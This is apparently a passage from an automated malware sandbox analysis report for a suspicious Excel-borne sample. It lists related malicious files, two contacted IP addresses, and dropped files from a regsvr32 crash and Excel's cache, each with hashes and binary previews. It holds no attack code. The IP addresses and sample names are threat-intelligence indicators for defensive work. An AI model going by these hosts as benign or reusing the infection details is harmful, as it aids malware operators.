                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_966f6bdcff9737fc802b47af467457fc41233c5_7a325c51_107bbe97\Report.wer
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11462
                                                                                                                                                              Entropy (8bit):3.77308262242532
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:wUq/zcQb6V+LH/RS5uGXx3RjetM/u7scS274ItUY:w/bca6VC/RS5n3jeO/u7scX4ItUY
                                                                                                                                                              MD5:CE37771697278B981D20999A95BFDF29
                                                                                                                                                              SHA1:00EF65F4D83D90E7739C7A599EF9BE2A3F44C814
                                                                                                                                                              SHA-256:9E949262E348E4642E2DEC6EA6EA8B818B85DAA990FB833EA2D859DAE6628818
                                                                                                                                                              SHA-512:56433A27593C14CB5A134FC0DED1EDBA496A5AD8383E0765061342F7890CEFA749C83FD07DD7A7DF46D2E5F2A0D20DAB7C709F99DE81D8E93A631B3FC67B2949
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.7.9.0.8.1.4.6.1.8.6.9.4.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.f.0.a.2.e.f.-.9.a.d.1.-.4.7.4.8.-.b.f.e.2.-.9.c.1.3.3.3.9.2.c.2.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.c.5.0.e.e.6.-.c.f.c.0.-.4.7.0.1.-.9.f.5.7.-.f.b.e.2.d.d.e.a.f.6.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.2.0.-.0.0.0.0.-.0.0.1.7.-.8.d.1.2.-.b.a.e.c.e.b.5.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_966f6bdcff9737fc802b47af467457fc41233c5_7a325c51_16353894\Report.wer
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11464
                                                                                                                                                              Entropy (8bit):3.774404084036514
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:ZDzcXb6VeLH/RS5uGXx3RjetM/u7shS274ItUZ:hcL6Vi/RS5n3jeO/u7shX4ItUZ
                                                                                                                                                              MD5:E9F4D44015D9C4E9E3FB16EA0B339B19
                                                                                                                                                              SHA1:2EC6BF906FDBB451D78599AFC59C737904D328DC
                                                                                                                                                              SHA-256:E7A1D97923F74F0BDEA6F7D60CC76744D76EF91992D17540288EFB2B299E9BC9
                                                                                                                                                              SHA-512:1A8357E418716B05CB3CEC9DE8EA413A303B8A582B872FFD7711FFD04FAF790B7FFA938D00857F24A912D4E083EFF6934A6DE29871B2827BF52960175352594D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.7.9.0.8.2.4.3.2.6.4.8.4.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.a.a.6.9.2.0.-.9.8.2.2.-.4.c.a.c.-.9.f.8.0.-.2.0.e.f.e.8.d.c.8.b.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.9.1.a.3.d.c.-.5.5.2.3.-.4.2.f.3.-.a.f.8.3.-.a.7.6.1.b.2.8.4.e.a.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.0.-.0.0.0.0.-.0.0.1.7.-.a.2.8.b.-.e.7.2.7.e.c.5.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER347D.tmp.dmp
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri Jun 11 18:04:03 2021, 0x1205a4 type
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):33660
                                                                                                                                                              Entropy (8bit):2.6336326099285547
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:anXMFMT+h1NeHzPCphDCJ7TSkKMpAWmc8XYgkW1PXRvOuC7fn8N:gKMe1kHzPue5pKlmW1PB2Zrg
                                                                                                                                                              MD5:955762FC852FDAF02B8660A1114FBDEB
                                                                                                                                                              SHA1:CE7F1BB2D11B2E6AF17BD792E53FD4E095335D31
                                                                                                                                                              SHA-256:B245B474807526B0C8C26ABE551522AA6A4315533A5109CF198F7C2EE94B6322
                                                                                                                                                              SHA-512:DEFF15F83828080E390D5E3016A7DD6C0F72E4C048C826A024A090D87F0FA4E63A2138D5305FD62D13E67E1AFB96559D2D88396D018889D8F89A1B89D34B0402
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: MDMP....... ..........`...................U...........B..............GenuineIntelW...........T..............`.............................@..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER379B.tmp.WERInternalMetadata.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8250
                                                                                                                                                              Entropy (8bit):3.6889691867893912
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Rrl7r3GLNi/nq6IFp6YLASUSgmfJaSsCpBB89b0KsfY8m:RrlsNii6IFp6YcSUSgmfJaSY0pfi
                                                                                                                                                              MD5:907479A12E4D85DDF14F9F9142776FA3
                                                                                                                                                              SHA1:DECFEB3FBE7BD6BA1BC3D322C8439BCAD9537F8D
                                                                                                                                                              SHA-256:649A8FF2209CFE63A50F05918B2AB89B12E69334C20D5973B875EABEB448AE37
                                                                                                                                                              SHA-512:DCD97D968C3B16A4ABB05606A58E110794A1374E2FE10EB0E5E37F04F09F540AC1911D3E45025C203A5A443CA707EEB14CCB139A1054BAD3DE988CBAB75D2C8E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.5.6.<./.P.i.d.>.......
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3867.tmp.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4620
                                                                                                                                                              Entropy (8bit):4.444867049906616
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cvIwSD8zsmJgtWI9SEWSC8BC8fm8M4Jkzcr6Fx+q8h4yi0KJYEgd:uITf8NdSNNJqcryM4t0qYEgd
                                                                                                                                                              MD5:F27F8B090714B7B211ABA1EF238685D8
                                                                                                                                                              SHA1:31CC278A8EAF86F82A94992698E3B524A8A43EF0
                                                                                                                                                              SHA-256:0591B5C913CE127A624F2C40D3C8E4A50494094EB5D819EB6CBA109931DBE4C4
                                                                                                                                                              SHA-512:0ABF12FBFD1FB5E6BC5DFE2414197985BC07B7CC2B2A95B9DB4764D134088BC50AAD056CD40033A82EC2B70ACD7C518C825A1B19D4CF52462DACBD2C249463AB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1029794" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB947.tmp.dmp
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri Jun 11 18:02:27 2021, 0x1205a4 type
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):34556
                                                                                                                                                              Entropy (8bit):2.5685832502010193
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:lGa80PVDBsRUUyBHLF5KWmc8XYgkW1BE6UgYQ9nLv:khylsibBH4lmW1G6UI9Lv
                                                                                                                                                              MD5:1BFD5C31626B609C283125C41A53F3AB
                                                                                                                                                              SHA1:45A7F6B3E4D0232AA791A3541C439DFC36E5ED4D
                                                                                                                                                              SHA-256:28E1EAAEDCA87B8E00D00D05FC41EB716B660E5915A96960FCBC244D1C4F5903
                                                                                                                                                              SHA-512:624C1850D8C842D82F960B2D8B0E1E153D86B223475AB0F1D6D2F478E153F47D3450EFE48C965C1583E6A7D038760E0B381E94E502E267C01C3A2E39B01829BA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: MDMP....... .......3..`...................U...........B..............GenuineIntelW...........T....... ...-..`.............................@..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD30.tmp.WERInternalMetadata.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8254
                                                                                                                                                              Entropy (8bit):3.6892490263246747
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Rrl7r3GLNihx6IFmQe6YyhSU6gmfJaSsCpBB89bLY+sf0MZm:RrlsNiX6IFQ6YsSU6gmfJaSYLY9fC
                                                                                                                                                              MD5:07583ADDD0C2F909CBC7FECF0CB17620
                                                                                                                                                              SHA1:C23F230B8FBDE7525E266A8C7AE32F200201232B
                                                                                                                                                              SHA-256:455BDB45B4A12C3C758DB74834C6C08237371BE24F5E0F3B4A39768A6E406AB4
                                                                                                                                                              SHA-512:75DBCA736C4CA950698683920303E2D9FDF9DE36607219FD4D71A6840F409B70B656E77EEE6FC9208AEB6B7BF36C58222300D50DB7B1B26910BBAC4DB00F953A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.6.0.<./.P.i.d.>.......
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE5A.tmp.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4620
                                                                                                                                                              Entropy (8bit):4.443734064950812
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cvIwSD8zsvJgtWI9SEWSC8BB8fm8M4Jkzcr6F5X+q8h4yiKgnKJYlgd:uITfRNdSNIJqcrOXM4tKaqYlgd
                                                                                                                                                              MD5:14A38E4CC5D1D757C0A80A8958FC13C0
                                                                                                                                                              SHA1:62478B617917D282CE95395C03CE021EFD30201B
                                                                                                                                                              SHA-256:EE3223F461B1FD62C34D95D1DAA5F0C42D2A059352DB7BFBAD2A58364478D63D
                                                                                                                                                              SHA-512:752B2761A95882FD456AADF2C917D4DB42A422D7093FA6F7B4C51251477EB761116326EA271A3A2003FD0EF469C40ADC6119B79F2A8F98343A91D0913E4DC3D6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1029793" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2931D31E-E476-4A7B-8B64-97D46D540C47
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):134922
                                                                                                                                                              Entropy (8bit):5.369100325878226
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ucQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:+EQ9DQW+ziXOe
                                                                                                                                                              MD5:7F817E75477C6B048DEA22A5933A521B
                                                                                                                                                              SHA1:21E70CA5F7BB6719B8EF1D109D4CBF3DAF609A55
                                                                                                                                                              SHA-256:A4CD53C0081A51A42DA8164EEE93A9B48D58FC9D31ADF99077E67B8123A58528
                                                                                                                                                              SHA-512:4D37F8AFCD2979F53E383739552E56533C9E72807585B41C1ED39D65E1B8D8BAA78ED98295422CD1A185A680F6D2C5D69B241B773279B68C57F20EF023EBDBD7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T09:02:03">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\352E3996.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 934 x 29, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):42557
                                                                                                                                                              Entropy (8bit):7.992800895943226
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:Pfsq4UmepRdblCFcXhw9KnRTRews6xD0FvBlwAS1A8x7BcS0OvD230:PR3ZblCF28KRsws6CFv0AYx7Bl3b230
                                                                                                                                                              MD5:B1F262A694930ADB699FA94E3394887F
                                                                                                                                                              SHA1:9C9B66D3A3F09AECA45DB94304CDD6FB3C5BD4C9
                                                                                                                                                              SHA-256:9C99EC61392B9022A38C1354124360147E8185065095BD2EC92B1416CF9F4B68
                                                                                                                                                              SHA-512:1CA7E6750178B88EC3AA7A0B83348EA389E26C27E0D7E919D807BE470714E5B4F04ACEB69D391F0498D4E465E6620E9449CA2F40755B5CE8196E683502EBF5F4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR.............6......sRGB.........pHYs..........+......IDATx^....dU....S.:ON.0.0....s0 .....$..%#HR.T.......$..0C...Su...[.TM..{.......C.S}..^{......].^..ZX.Wb.W....X!..A.P....0..u...X.V.3.....z..tiO{GW..?...A.......ca2Y.... ...cAX..zZ..2M.$..g.O.e..r?z&................*....*.=..Z.A........a.Z..ka<..N.R.c......./.[..j.^...Nk.(..y.,..z"...R..Z+..D1Q....z....0..u~..jU_.b.Z.V....:..5:.(.......-...A2.O.{..p.j..].<........0..0..+...E...^...z....#..j.d...X._..1..M.5..O.^.."..l....G....U1........X.6.Z.\.&..h..m*..T..xH.j..3<$.H...a..n....}t.A.jT.6G.h@..<.x..x...cb......C..{.D.'QW<.o~..?.....4F_..B..h.\...y8..)....j.Z.d..#P..P..O.....(.0...f....B_z>.E .w../..(...'.Fw..yT..G..)...b9..g.AA`.a..v.zfY.F........._r.i.d.`....Q.g.m"..\..&.t.X.q1}.$.S....2..~...d."..1.. (.0.F....t...i..@f.. ...(..8..q.....I.....ad.....z%....;...y.O...X<Q..X.....B..H........<)....4.&9.4......1.h..#B.....g.....bO.59.A..M.....J..vX3*5..X....(G.A.u...8.. .{
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\437B2448.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):848
                                                                                                                                                              Entropy (8bit):7.595467031611744
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                              MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                              SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                              SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                              SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6E6E46AA.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 521 x 246, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32996
                                                                                                                                                              Entropy (8bit):7.975478139053759
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:N4k48AnTViUidx37OODgvnrxtxAudMN1VTRVHdB4K7K:NE8m+L37OOwrCXN1VTR1PK
                                                                                                                                                              MD5:4E69B72B0CE87CC7EE30AA1A062147FE
                                                                                                                                                              SHA1:09B0AA5414E08756E0AE53E1BE5C70DB4DEAF2E8
                                                                                                                                                              SHA-256:77A1F749389CBF771D5197FF0FF17113FCA1D91989ADCADF2852876A6CC14988
                                                                                                                                                              SHA-512:6246AF2137E773F7719033AFE75F0B00FF3A4B5543DBA53737FC8D33EE42478E3D8A5CF166E9EFD2F54A2F3E0D62417BDDC1CB824642305B59AB1229313D2D79
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR..............[.J....sRGB.........pHYs..........+......IDATx^.].`......{%.$..A...R.P@z....O...S.<;.VT.REA.(...I...{.......m...]..r./.......~.|]h.Z....P.(........E."@...P.(.v.P.@..E."@....#@y.......E."@y.......E."...*78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x..
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\725B52A3.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):557
                                                                                                                                                              Entropy (8bit):7.343009301479381
                                                                                                                                                              Encrypted:false
